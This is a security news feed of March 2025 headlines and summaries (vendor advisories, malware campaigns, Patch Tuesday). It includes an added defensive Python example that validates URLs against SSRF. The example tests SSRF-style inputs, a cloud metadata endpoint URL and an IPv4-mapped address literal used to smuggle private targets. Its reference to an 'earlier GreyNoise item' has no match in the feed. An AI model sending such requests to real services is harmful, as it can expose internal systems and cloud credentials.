https://asec.ahnlab.com/en/86775/

USN-7348-1: Python vulnerabilities
It was discovered that the Python ipaddress module contained incorrect information about which IP address ranges were considered “private” or “globally reachable”. This could possibly result in applications applying incorrect security policies. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2024-4032) It was discovered that Python incorrectly handled quoting path names when using the venv module. A local attacker able to control virtual environments could possibly use this issue to execute arbitrary code when the virtual environment is activated. (CVE-2024-9287) It was discovered that Python incorrectly handled parsing bracketed hosts. A remote attacker could possibly use this issue to perform a Server-Side Request Forgery (SSRF) attack. This issue only affected...
https://ubuntu.com/security/notices/USN-7348-1
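
The Python advisory above (CVE-2024-4032, and the bracketed-host SSRF issue) and the earlier GreyNoise item on the SSRF exploitation surge meet in one place: the code that decides whether a user-supplied URL may be fetched. An application that leans only on `ipaddress.is_private` / `is_global` inherits whatever classification table the interpreter ships, and a URL parser that mishandles bracketed hosts can walk a literal past the check. The example below is added here (not from the advisory or CPython) and shows a target check that keeps its own denylist, unwraps IPv4-mapped IPv6 literals and treats anything the parser rejects as hostile. The denylist contents and the three-way verdict are assumptions of this example.

```python
"""Added example: validating an outbound-request target before an SSRF-prone fetch.

Illustrative code, not CPython's or the advisory's; the denylist is a starting point,
not a complete inventory of non-routable space.
"""
import ipaddress
from urllib.parse import urlsplit

# Explicit denylist maintained by the application, independent of stdlib tables
# (assumed policy for this example; extend it for your own environment).
DENIED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8",                                        # "this" network
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",    # RFC 1918
    "100.64.0.0/10",                                    # carrier-grade NAT
    "127.0.0.0/8",                                      # loopback
    "169.254.0.0/16",                                   # link-local, incl. 169.254.169.254 metadata
    "::1/128", "fc00::/7", "fe80::/10",
)]


def ip_is_globally_reachable(addr) -> bool:
    """True only if addr passes both our denylist and the interpreter's own flags."""
    # ::ffff:10.0.0.1 is the classic way to smuggle a v4 target past a v6-shaped check:
    # unwrap it and judge the embedded IPv4 address instead.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        return ip_is_globally_reachable(addr.ipv4_mapped)
    if any(addr in net for net in DENIED_NETWORKS):
        return False
    # Belt and braces: also honour whatever the running interpreter knows.
    if (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified):
        return False
    return addr.is_global


def literal_is_globally_reachable(text: str) -> bool:
    """Convenience wrapper for a textual IP literal."""
    return ip_is_globally_reachable(ipaddress.ip_address(text))


def classify_url_target(url: str):
    """Return (verdict, detail) for a user-supplied URL.

    verdict is "allow", "deny" or "resolve".  "resolve" means a DNS name: the caller must
    resolve it, run ip_is_globally_reachable on every returned address, and then connect
    to that exact address, otherwise a DNS-rebinding window remains."""
    try:
        parts = urlsplit(url)
        host = parts.hostname
    except ValueError as exc:
        # Newer interpreters raise here for a malformed bracketed host; treat as hostile.
        return "deny", f"unparseable URL: {exc}"
    if parts.scheme not in ("http", "https"):
        return "deny", f"scheme {parts.scheme!r} not allowed"
    if not host:
        return "deny", "empty host"
    authority = parts.netloc.rsplit("@", 1)[-1]          # drop userinfo
    bracketed = authority.startswith("[")
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        if bracketed:
            # Brackets promise an IPv6 literal; anything else is parser confusion.
            return "deny", f"bracketed host {host!r} is not an IP literal"
        return "resolve", host
    if ip_is_globally_reachable(addr):
        return "allow", str(addr)
    return "deny", f"{addr} is not globally reachable"


if __name__ == "__main__":
    for u in ("http://8.8.8.8/", "http://[::ffff:10.0.0.1]/",
              "http://169.254.169.254/latest/meta-data/", "https://example.com/api"):
        print(u, "->", classify_url_target(u))
```

The "resolve" verdict is deliberate: a hostname check is only as good as the address the socket finally connects to, so the decision has to be repeated on the resolved address and the connection pinned to it.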

The dark side of sports betting: How mirror sites help gambling scams thrive
Sports betting is a multi-billion-dollar industry, but behind the flashing lights and promises of easy money lies a hidden underworld of deception.
https://www.malwarebytes.com/blog/personal/2025/03/the-dark-side-of-sports-betting-how-mirror-sites-help-gambling-scams-thrive

The Security-Conscious Sysadmin's Guide to Choosing the Right Linux Distro
When it comes to maintaining the security and efficiency of your systems, selecting a Linux distribution can make all the difference. Junior sysadmins who prioritize security often come down to three popular choices: Debian, Fedora, and Ubuntu.
https://linuxsecurity.com/features/features/choosing-the-right-linux-distro

Explaining External Network Assessment with Vector Command
Learn how external network assessment works within Vector Command, Rapid7's continuous red team managed service.
https://blog.rapid7.com/2025/03/12/explaining-external-network-assessment-with-vector-command/

The Intersection of Digital Credit Solutions and Cybersecurity: Protecting Consumer Data in the Automotive Finance Industry
Digital credit solutions deliver convenience, speed, and flexibility. Along with its benefits, however, comes risk. Protecting consumer data has always been a priority for dealerships. It's now a more complex... The post The Intersection of Digital Credit Solutions and Cybersecurity: Protecting Consumer Data in the Automotive Finance Industry appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/the-intersection-of-digital-credit-solutions-and-cybersecurity-protecting-consumer-data-in-the-automotive-finance-industry/

WatchGuard unveils FireCloud Internet Access
WatchGuard® Technologies, a provider of unified cybersecurity, has announced the launch of FireCloud Internet Access, the first in what it’s describing as “a new family of hybrid secure access service edge (SASE) products”. The company said that FireCloud “uniquely meets the needs of hybrid organisations and WatchGuard's partners by delivering consistency across Fireboxes and FireCloud […] The post WatchGuard unveils FireCloud Internet Access appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/03/12/watchguard-unveils-firecloud-internet-access/?utm_source=rss&utm_medium=rss&utm_campaign=watchguard-unveils-firecloud-internet-access

Android devices track you before you even sign in
Google spies on Android device users, starting from even before they have logged in to their Google account.
https://www.malwarebytes.com/blog/news/2025/03/android-devices-track-you-before-you-even-sign-in

Incident response analyst report 2024
Kaspersky provides incident response statistics for 2024, as well as analysis of real incidents. The report also shares IR trends and cybersecurity recommendations.
https://securelist.com/kaspersky-incident-response-report-2024/115873/

Microsoft: 6 Zero-Days in March 2025 Patch Tuesday
Microsoft today issued more than 50 security updates for its various Windows operating systems, including fixes for a whopping six zero-day vulnerabilities that are already seeing active exploitation.
https://krebsonsecurity.com/2025/03/microsoft-6-zero-days-in-march-2025-patch-tuesday/

Patch Tuesday - March 2025
Seven zero-days. Win32 EoP. Multiple filesystem driver attacks. MMC security feature bypass. Access (again). WSL magic email RCE. Malicious RDP server.
https://blog.rapid7.com/2025/03/11/patch-tuesday-march-2025/

Alleged Co-Founder of Garantex Arrested in India
Authorities in India today arrested the alleged co-founder of Garantex, a cryptocurrency exchange sanctioned by the U.S. government in 2022 for facilitating tens of billions of dollars in money laundering by transnational criminal and cybercriminal organizations. Sources close to the investigation told KrebsOnSecurity the Lithuanian national Aleksej Besciokov, 46, was apprehended while vacationing on the coast of India with his family.
https://krebsonsecurity.com/2025/03/alleged-co-founder-of-garantex-arrested-in-india/

New XCSSET malware adds new obfuscation, persistence techniques to infect Xcode projects
Microsoft Threat Intelligence has uncovered a new variant of XCSSET, a sophisticated modular macOS malware that infects Xcode projects, in the wild. Its first known variant since 2022, this latest XCSSET malware features enhanced obfuscation methods, updated persistence mechanisms, and new infection strategies. These enhanced features help this malware family steal and exfiltrate files and system and user information, such as digital wallet data and notes, among others. The post New XCSSET malware adds new obfuscation, persistence techniques to infect Xcode projects appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2025/03/11/new-xcsset-malware-adds-new-obfuscation-persistence-techniques-to-infect-xcode-projects/

2025 Cybersecurity Trends and Predictions: Adapting To An Era Of Evolving Threads And Technology
All organizations today rely on technology. Whether you’re a small non-profit, a government agency, a hospital, or a traditional business, digital tools power everything from communications to service delivery to... The post 2025 Cybersecurity Trends and Predictions: Adapting To An Era Of Evolving Threads And Technology appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/2025-cybersecurity-trends-and-predictions-adapting-to-an-era-of-evolving-threads-and-technology/

Weekly Detection Rule (YARA and Snort) Information – Week 2, March 2025
The following is the information on Yara and Snort rules (week 2, March 2025) collected and shared by the AhnLab TIP service. 5 YARA Rules Detection name Description Source PK_Generic_RD127 Phishing Kit – RD127 – Generic email credentials stealer https://github.com/t4d/PhishingKit-Yara-Rules PK_LIDL_ninja Phishing Kit impersonating LIDL https://github.com/t4d/PhishingKit-Yara-Rules PK_MTBank_yochi2 Phishing Kit impersonating M&T Bank https://github.com/t4d/PhishingKit-Yara-Rules PK_SpareBank_perso Phishing […]
https://asec.ahnlab.com/en/86759/

February 2025 Security Issues in Korean & Global Financial Sector
This report comprehensively covers actual cyber threats and security issues that have occurred in the financial industry in South Korea and abroad. This includes an analysis of malware and phishing cases targeting the financial industry, a list of the top 10 malware strains that target the industry, and statistics on the industries of the Korean […]
https://asec.ahnlab.com/en/86831/

Enhancing Cybersecurity Quality Assurance with AI & Machine Learning
Cyber threats and Linux vulnerabilities are advancing and evolving at an unprecedented pace, becoming increasingly difficult to detect and mitigate. This worrisome trend makes it imperative for organizations to adopt robust and adaptive security measures to counter these growing risks.
https://linuxsecurity.com/features/features/how-ai-and-machine-learning-are-transforming-cybersecurity-quality-assurance

Certifications And Career Opportunities For Women In Cybersecurity
This week in cybersecurity from the editors at Cybercrime Magazine – Read the full BBN Times story. Sausalito, Calif. – Mar. 11, 2025. Despite the increasing efforts to increase women's representation in cybersecurity, the industry still has a long way to go. However, there is progress on The post Certifications And Career Opportunities For Women In Cybersecurity appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/certifications-and-career-opportunities-for-women-in-cybersecurity/

The Rise Of AI-Powered Cyber Threats: How Adversaries Are Using “Good Enough” Tactics to Outsmart Defenders
As we move into 2025, organizations are laser-focused on maximizing resources and achieving better business outcomes. Increasingly, this translates into leveraging AI and automation to streamline operations, improve efficiency, and... The post The Rise Of AI-Powered Cyber Threats: How Adversaries Are Using “Good Enough” Tactics to Outsmart Defenders appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/the-rise-of-ai-powered-cyber-threats-how-adversaries-are-using-good-enough-tactics-to-outsmart-defenders/

Helping us help you: Practical applications of AI in the SOC
Whether or not you're a customer of Rapid7's managed security offerings, it's worth understanding how AI is already transforming security operations today – not as a vague promise of the future, but as a real, tangible advantage in the fight against cyber threats.
https://blog.rapid7.com/2025/03/11/helping-us-help-you-practical-applications-of-ai-in-the-soc/

Bypassing picklescan: Sonatype discovers four vulnerabilities
Sonatype has discovered and disclosed four vulnerabilities in picklescan, a tool designed to help developers scan Python pickle files for malicious content. Pickle files, used for serializing and deserializing Python AI/ML models, can be a security risk as they allow for arbitrary code execution during the deserialization process.
https://www.sonatype.com/blog/bypassing-picklescan-sonatype-discovers-four-vulnerabilities

DCRat backdoor returns
Kaspersky experts describe a new wave of attacks distributing the DCRat backdoor through YouTube under the guise of game cheats.
https://securelist.com/new-wave-of-attacks-with-dcrat-backdoor-distributed-by-maas/115850/

Bypassing Web Filters Part 1: SNI Spoofing
This is the first part of a series of blog posts about techniques to bypass web filters, looking at increasingly advanced techniques with each part. The first part is about how SNI spoofing can be used to bypass web filters.
https://blog.compass-security.com/2025/03/bypassing-web-filters-part-1-sni-spoofing/

Web application firewall rules bypass by using an empty filename
Two improper handling of syntactically invalid structure vulnerabilities [CWE-228] in FortiWeb may allow an unauthenticated attacker to bypass web firewall protections via HTTP/S crafted requests. Revised on 2025-03-13 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-23-115

Apache Camel Vulnerability - CVE-2025-27636
CVE-2025-27636: Bypass/Injection vulnerability in the Apache Camel-Bean component under particular conditions. This issue affects Apache Camel: from 4.10.0 through
https://fortiguard.fortinet.com/psirt/FG-IR-25-166

Authenticated SQLI on CLI
Two improper neutralization of special elements used in an SQL Command ('SQL Injection') vulnerability [CWE-89] in FortiAnalyzer, FortiManager & FortiAnalyzer-BigData may allow a privileged attacker to execute unauthorized code or commands via specifically crafted CLI requests. Revised on 2025-03-11 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-130

Client-side enforcement of server-side security related to vm download feature
A client-side enforcement of server-side security vulnerability [CWE-602] in FortiSandbox may allow an authenticated attacker with at least read-only permission to execute unauthorized commands via crafted requests. Revised on 2025-03-11 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-305

Cross Site Request Forgery in admin endpoint
A cross site request forgery vulnerability [CWE-352] in FortiNDR may allow a remote unauthenticated attacker to execute unauthorized actions via crafted HTTP GET requests. Revised on 2025-03-11 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-23-353

Directory Traversal Arbitrary File Write Vulnerability
An Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability [CWE-22] in FortiWeb API endpoint may allow an authenticated attacker with admin privileges to access and modify the filesystem. Revised on 2025-03-11 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-439

Exposure of Sensitive Information to an Unauthorized Actor
An exposure of sensitive information to an unauthorized actor vulnerability [CWE-200] in FortiSIEM may allow a remote unauthenticated attacker who acquired knowledge of the agent's authorization header by other means to read the database password via crafted api requests Revised on 2025-03-11 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-23-117

Incorrect authorization in GUI console
An incorrect authorization vulnerability [CWE-863] in FortiSandbox may allow a low privileged administrator to execute elevated CLI commands via the GUI console menu. Revised on 2025-03-11 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-261

Incorrect authorization in incident page
An incorrect authorization vulnerability [CWE-863] in FortiSIEM may allow an authenticated attacker to perform unauthorized operations on incidents via crafted HTTP requests. Revised on 2025-03-11 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-377

VMware Multiple Products Zero-day Vulnerabilities
What is the Vulnerability? Multiple zero-day vulnerabilities have been identified in VMware's ESXi, Workstation, and Fusion products. VMware has confirmed that these vulnerabilities are being actively exploited in the wild, and the Cybersecurity and Infrastructure Security Agency (CISA) has included them in its Known Exploited Vulnerabilities Catalog due to evidence of such exploitation. The vendor advisory indicates that these vulnerabilities were reported to VMware by the Microsoft Threat Intelligence Center.
• CVE-2025-22225: Arbitrary Write Vulnerability in VMware ESXi
• CVE-2025-22224: TOCTOU Race Condition Vulnerability in VMware ESXi and Workstation
• CVE-2025-22226: Information Disclosure Vulnerability in VMware ESXi, Workstation, and Fusion
What is the recommended Mitigation? Updates...
https://fortiguard.fortinet.com/threat-signal-report/6026

X users report login troubles as Dark Storm claims cyberattack
In the early morning hours of March 10, thousands of users on X (formerly Twitter) began having trouble logging into the...
https://www.malwarebytes.com/blog/news/2025/03/x-users-report-login-troubles-as-dark-storm-claims-cyberattack

AI Security and Governance
Originally written by Hyland Security. Artificial Intelligence (AI) has become an integral part of our daily lives and business operations, permeating various industries with its advanced capabilities. However, the rapid adoption of AI technologies also brings significant risks and challenges, necessitating robust AI security and governance to ensure that AI systems operate transparently, ethically, and within regulatory frameworks, safeguarding individual rights and societal interests. ...
https://cloudsecurityalliance.org/articles/ai-security-and-governance

MIWIC25 – Eva Benn, Chief of Staff, Strategy – Microsoft Red Team
Organised by Eskenzi PR in media partnership with the IT Security Guru, the Most Inspiring Women in Cyber Awards aim to shed light on the remarkable women in our industry. The following is a feature on one of 2024's Top 20 women selected by an esteemed panel of judges. Presented in a Q&A format, the nominee's answers are […] The post MIWIC25 – Eva Benn, Chief of Staff, Strategy – Microsoft Red Team appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/03/10/miwic25-eva-benn-chief-of-staff-strategy-microsoft-red-team/?utm_source=rss&utm_medium=rss&utm_campaign=miwic25-eva-benn-chief-of-staff-strategy-microsoft-red-team

How ads weirdly know your screen brightness, headphone jack use, and location, with Tim Shott (Lock and Code S06E05)
This week on the Lock and Code podcast, we speak with Tim Shott about his attempt to find his location data following a major data breach.
https://www.malwarebytes.com/blog/podcast/2025/03/how-ads-weirdly-know-your-screen-brightness-headphone-jack-use-and-location-with-tim-shott-lock-and-code-s06e05

Full exposure: A practical approach to handling sensitive data leaks
Treating exposures as full and complete can help you respond more effectively to focus on what truly matters: securing systems, protecting sensitive data, and maintaining the trust of stakeholders. The post Full exposure: A practical approach to handling sensitive data leaks appeared first on The GitHub Blog.
https://github.blog/security/full-exposure-a-practical-approach-to-handling-sensitive-data-leaks/

Navigating Cyber Security Implementation Challenges in SMBs
Cyber Security is often a low priority for SMBs. Many SMBs lack a dedicated security specialist; instead, security responsibilities are typically handled by the IT department, which is already overwhelmed with general IT... The post Navigating Cyber Security Implementation Challenges in SMBs appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/navigating-cyber-security-implementation-challenges-in-smbs/

February 2025 Infostealer Trend Report
This report provides statistics, trends, and case information on the distribution quantity, distribution methods, and disguise techniques of Infostealer collected and analyzed during February 2025. Below is a summary of the report. 1. Data Sources and Collection Methods: To proactively respond to Infostealer, AhnLab SEcurity intelligence Center (ASEC) operates various systems that automatically […]
https://asec.ahnlab.com/en/86766/

February 2025 APT Group Trends (South Korea)
Overview: AhnLab is monitoring Advanced Persistent Threat (APT) attacks in South Korea using its own infrastructure. This report covers the classification, statistics, and features of the APT attacks in South Korea that were identified in February 2025, as well as the attack types. Figure 1. Statistics of APT attacks in South Korea in […]
https://asec.ahnlab.com/en/86830/

Fake CAPTCHA websites hijack your clipboard to install information stealers
An increasing number of websites use a clipboard hijacker and instruct victims on how to infect their own machine.
https://www.malwarebytes.com/blog/news/2025/03/fake-captcha-websites-hijack-your-clipboard-to-install-information-stealers

Seeing The Whole Picture: A Better Way To Manage Your Attack Surface
With cloud adoption, remote work, shadow IT, and AI, security teams face an overwhelming challenge: scoping their attack surface and continuously discovering all assets and exposures before threats emerge.
https://blog.rapid7.com/2025/03/10/seeing-the-whole-picture-a-better-way-to-manage-your-attack-surface/

HACK Global Cybersecurity ETF Reaches $1B In Assets Under Management
This week in cybersecurity from the editors at Cybercrime Magazine – Read the full story in Betashares. Sausalito, Calif. – Mar. 10, 2025. With so many interconnected devices in business and at home, cybersecurity isn't just a line item on IT budgets – it's a necessity The post HACK Global Cybersecurity ETF Reaches $1B In Assets Under Management appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/hack-global-cybersecurity-etf-reaches-1b-in-assets-under-management/

SideWinder targets the maritime and nuclear sectors with an updated toolset
In this article, we discuss the tools and TTPs used in the SideWinder APT's attacks in H2 2024, as well as shifts in its targets, such as an increase in attacks against the maritime and logistics sectors.
https://securelist.com/sidewinder-apt-updates-its-toolset-and-targets-nuclear-sector/115847/

A week in security (March 3 – March 9)
A list of topics we covered in the week of March 3 to March 9 of 2025
https://www.malwarebytes.com/blog/news/2025/03/a-week-in-security-march-3-march-9

Malwarebytes Premium Security awarded “Product of the Year” from AVLab
Malwarebytes Premium Security has once again been awarded “Product of the Year” after successfully blocking 100% of “in-the-wild” malware samples.
https://www.malwarebytes.com/blog/personal/2025/03/malwarebytes-premium-security-awarded-product-of-the-year-from-avlab

February 2025 Threat Trend Report on Ransomware
This report provides statistics on the number of new ransomware samples, number of targeted systems, and targeted companies collected in February 2025, as well as major Korean and international ransomware issues worth noting. Below are the summarized details. The number of ransomware samples and number of damaged systems is based on the detection names […]
https://asec.ahnlab.com/en/86763/

Feds Link $150M Cyberheist to 2022 LastPass Hacks
In September 2023, KrebsOnSecurity published findings from security researchers who concluded that a series of six-figure cyberheists across dozens of victims resulted from thieves cracking master passwords stolen from the password manager service LastPass in 2022. In a court filing this week, U.S. federal agents investigating a spectacular $150 million cryptocurrency heist said they had reached the same conclusion.
https://krebsonsecurity.com/2025/03/feds-link-150m-cyberheist-to-2022-lastpass-hacks/

The Hidden Costs of Manual GRC in a Cloud-First World
Originally published by RegScale. Before I joined RegScale, I was a big buyer of legacy GRC tools. I won't name any particular tools, but most of them featured 20-year-old approaches and “automation” in name only. At the end of the day, they left teams heavily reliant on manual processes disguised as digital solutions, with no shortage of spreadsheets and tedious tasks. At the same time, I've watched two major trends reshape the GRC landscape: The shift to cloud-na...
https://cloudsecurityalliance.org/articles/the-hidden-costs-of-manual-grc-in-a-cloud-first-world

Vulnerability Reward Program: 2024 in Review
Posted by Dirk Göhmann. In 2024, our Vulnerability Reward Program confirmed the ongoing value of engaging with the security research community to make Google and its products safer. This was evident as we awarded just shy of million to over 600 researchers based in countries around the globe across all of our programs.
Vulnerability Reward Program 2024 in Numbers: You can learn about who's reporting to the Vulnerability Reward Program via our Leaderboard – and find out more about our youngest security researchers who've recently joined the ranks of Google bug hunters.
VRP Highlights in 2024: In 2024 we made a series of changes and improvements coming to our vulnerability reward programs and related initiatives: The Google VRP revamped its reward structure, bumping rewards up to a maximum...
http://security.googleblog.com/2025/03/vulnerability-reward-program-2024-in.html

Reddit will start warning users that upvote violent content
Reddit administration announced that the platform will start sending warnings to users that upvote violent content.
https://www.malwarebytes.com/blog/news/2025/03/reddit-will-start-warning-users-that-upvote-violent-content

The Ransomware Epidemic: Why SMEs Are The New Primary Target
This week in cybersecurity from the editors at Cybercrime Magazine –Read the full story in Forbes Sausalito, Calif. – Mar. 7, 2025 Forbes Technology Council Member Aliasgar Dohadwala points out that for small and medium enterprises (SMEs), the consequences of ransomware can be catastrophic, with 60 The post The Ransomware Epidemic: Why SMEs Are The New Primary Target appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/the-ransomware-epidemic-why-smes-are-the-new-primary-target/

Advancing Gender Equality in 2025 and Beyond
International Women's Day (IWD) 2025 carries the powerful theme: ‘Accelerate Action.' This theme calls on individuals, communities, and organisations to take decisive steps toward achieving gender equality. Despite ongoing efforts, at the current rate of progress, it will take until 2158, more than five generations, to reach full gender parity, according to the World Economic […] The post Advancing Gender Equality in 2025 and Beyond appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/03/07/advancing-gender-equality-in-2025-and-beyond/?utm_source=rss&utm_medium=rss&utm_campaign=advancing-gender-equality-in-2025-and-beyond

Multiple Vulnerabilities Discovered in a SCADA System
We identified multiple vulnerabilities in ICONICS Suite, SCADA software used in numerous OT applications. This article offers a technical analysis of our findings. The post Multiple Vulnerabilities Discovered in a SCADA System appeared first on Unit 42.
https://unit42.paloaltonetworks.com/vulnerabilities-in-iconics-software-suite/

Who is the DOGE and X Technician Branden Spikes?
At 49, Branden Spikes isn't just one of the oldest technologists who has been involved in Elon Musk's Department of Government Efficiency (DOGE). As the current director of information technology at X/Twitter and an early hire at PayPal, Zip2, Tesla and SpaceX, Spikes is also among Musk's most loyal employees. Here's a closer look at this trusted Musk lieutenant, whose Russian ex-wife was once married to Elon's cousin.
https://krebsonsecurity.com/2025/03/who-is-the-doge-and-x-technician-branden-spikes/

Metasploit Wrap-Up 03/06/2025
This week's Metasploit Wrap Up saw 3 new modules. Learn more about the enhancements, features, and bugs fixed.
https://blog.rapid7.com/2025/03/06/metasploit-wrap-up-03-06-2025/

What Is Data Leak Prevention? Benefits and Best Practices
Today's organizations work with incredible quantities of data. From corporate trade secrets to customers' and employees' personal information, much of this data is not fit for public consumption. But with growing volumes and complex IT environments, the potential for leakage is immense.
https://www.legitsecurity.com/blog/data-leak-prevention

What Is an Identity Provider (IdP) and How Does It Work?
Managing online accounts shouldn't feel like a chore. But when so many websites and systems require credentials, it's hard to keep track.
https://www.legitsecurity.com/blog/identity-provider-idp

Patch Management Guide: Benefits and Best Practices
Developers periodically review software and release patches to remedy any bugs. When patches happen often, they can be hard to track.
https://www.legitsecurity.com/blog/patch-management-best-practices

Women's History Month: Why different perspectives in cybersecurity and AI matter more than ever before
This Women's History Month serves as a crucial moment for us to lead and continue to pave the way for a more inclusive future. I am truly honored to support my amazing women colleagues who continue to excel in their careers. Their diverse perspectives and talents are invaluable, driving innovation and progress across various industries. I am proud to be a part of Microsoft Security, which is focused on building and nurturing an inclusive cybersecurity workforce and curating careers, tools, and resources that work for everyone. We recognize that this is what promotes business growth, strengthens global defenses, and enhances AI safety. The post Women's History Month: Why different perspectives in cybersecurity and AI matter more than ever before appeared first on Microsoft Security Blog....
https://www.microsoft.com/en-us/security/blog/2025/03/06/womens-history-month-why-different-perspectives-in-cybersecurity-and-ai-matter-more-than-ever-before/

What you need to know about South Korea's AI Basic Act
Originally published by Schellman&Co. *Disclaimer: This article was written using a translated copy of the South Korea AI Basic Act* After the European Union paved the way for creating a legal framework for artificial intelligence (AI) in early 2024, many wondered what government or jurisdiction would follow. The year continued with discussions on how to best implement AI governance and debates on where the line stands between sufficient governance and proper opportunit...
https://cloudsecurityalliance.org/articles/what-you-need-to-know-about-south-korea-s-ai-basic-act

From Ransomware to Regulation: Lessons from the Worst Year of Healthcare Cyber Breaches
Originally published by Censys.   In 2024, it's estimated that the two largest healthcare cyber incidents impacted over 100 million people, including patients and vendors across an interconnected digital landscape of insurers and healthcare providers. By October of 2024, 386 cybersecurity attacks had been reported in the U.S. against healthcare and 3rd-party providers, with Change Healthcare and Kaiser Permanente being among the most significant breaches. It has been, objectively, t...
https://cloudsecurityalliance.org/articles/from-ransomware-to-regulation-lessons-from-the-worst-year-of-healthcare-cyber-breaches

Malvertising campaign leads to info stealers hosted on GitHub
Microsoft detected a large-scale malvertising campaign in early December 2024 that impacted nearly one million devices globally. The attack originated from illegal streaming websites embedded with malvertising redirectors and ultimately redirected users to GitHub to deliver initial access payloads as the start of a modular and multi-stage attack chain. The post Malvertising campaign leads to info stealers hosted on GitHub appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2025/03/06/malvertising-campaign-leads-to-info-stealers-hosted-on-github/

Ransomware threat mailed in letters to business owners
CEOs and business owners received personal, customized ransomware threats in a series of letters sent in the mail through USPS.
https://www.malwarebytes.com/blog/news/2025/03/ransomware-threat-mailed-in-letters-to-business-owners

Android Malware & Security Issue 1st Week of March, 2025
ASEC Blog publishes “Android Malware & Security Issue 1st Week of March, 2025”
https://asec.ahnlab.com/en/86652/

Rust in the enterprise: Best practices and security considerations
As Rust programming language adoption continues to grow, enterprises are beginning to integrate it into their development ecosystems.
https://www.sonatype.com/blog/rust-in-the-enterprise-best-practices-and-security-considerations

The Best 100 Cybercrime Podcasts
This week in cybersecurity from the editors at Cybercrime Magazine –Read the full list in MillionPodcasts Sausalito, Calif. – Mar. 6, 2025 MillionPodcasts, who calls itself the ultimate destination for podcast media contacts, recently released a list of the best 100 cybercrime podcasts. The Cybercrime Magazine Podcast, The post The Best 100 Cybercrime Podcasts appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/the-best-100-cybercrime-podcasts/

Legit SLA Management & Governance – Built for Enterprise-Scale AppSec
Get details on Legit's powerful SLA management capabilities.
https://www.legitsecurity.com/blog/legit-sla-management-and-governance

KnowBe4 Wins Cybersecurity Company of the Year at the 2025 teissAwards
KnowBe4, the world-renowned cybersecurity platform that comprehensively addresses human risk management, today announced that it has been awarded first place in this year's teissAwards Cybersecurity Company of the Year category for enterprise organisations. The teissAwards celebrate excellence in cyber and information security, recognising the outstanding contributions of vendors and technologies over the past year. Winning first place […] The post KnowBe4 Wins Cybersecurity Company of the Year at the 2025 teissAwards appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/03/06/knowbe4-wins-cybersecurity-company-of-the-year-at-the-2025-teissawards/?utm_source=rss&utm_medium=rss&utm_campaign=knowbe4-wins-cybersecurity-company-of-the-year-at-the-2025-teissawards

The Next Level: Typo DGAs Used in Malicious Redirection Chains
A graph intelligence-based pipeline and WHOIS data are among the tools we used to identify this campaign, which introduced a variant of domain generation algorithms. The post The Next Level: Typo DGAs Used in Malicious Redirection Chains appeared first on Unit 42.
https://unit42.paloaltonetworks.com/typo-domain-generation-algorithms/

Enterprises Should Consider Replacing Employees' Home TP-Link Routers
An examination of CVE trends from February 2025 scanning data.
https://www.f5.com/labs/articles/threat-intelligence/enterprises-should-consider-replacing-employees-home-tp-link-routers

Trojans disguised as AI: Cybercriminals exploit DeepSeek's popularity
Kaspersky experts have discovered campaigns distributing stealers, malicious PowerShell scripts, and backdoors through web pages mimicking the DeepSeek and Grok websites.
https://securelist.com/backdoors-and-stealers-prey-on-deepseek-and-grok/115801/

Citrix NetScaler ADC and NetScaler Gateway Unauthenticated Remote Code Execution Vulnerability (CVE-2023-3519)
What is Citrix NetScaler ADC and NetScaler Gateway? Citrix NetScaler ADC, previously known as Citrix ADC, is an Application Delivery Controller (ADC) designed to achieve secure and optimized network traffic. Citrix NetScaler Gateway, previously known as Citrix Gateway, is an SSL-VPN solution designed to provide secure and optimized remote access.
What is the Attack? According to the advisory published by Citrix, CVE-2023-3519 is an unauthenticated remote code execution vulnerability that affects the unmitigated Citrix NetScaler ADC and NetScaler Gateway products. For these products to be vulnerable, they must be configured either as a gateway or as an authentication, authorization, and auditing (AAA) virtual server. The advisory also confirms that Citrix-managed servers have already been mitigated,...
https://fortiguard.fortinet.com/threat-signal-report/5227

Ivanti Connect Secure Zero-Day Vulnerability
What are the Vulnerabilities? Ivanti disclosed two vulnerabilities, CVE-2025-0282 and CVE-2025-0283, impacting Ivanti Connect Secure (“ICS”) VPN appliances. CVE-2025-0282 is an unauthenticated stack-based buffer overflow affecting Ivanti Connect Secure, Policy Secure, and ZTA Gateways. Successful exploitation could result in unauthenticated remote code execution. CVE-2025-0283 is a stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 that allows a local authenticated attacker to escalate their privileges. According to a blog released by Mandiant, it has identified zero-day exploitation of CVE-2025-0282 in the wild beginning mid-December 2024. Ivanti Connect...
https://fortiguard.fortinet.com/threat-signal-report/5612

Understanding UEBA: Essential Guide to User and Entity Behavior Analytics in Cybersecurity
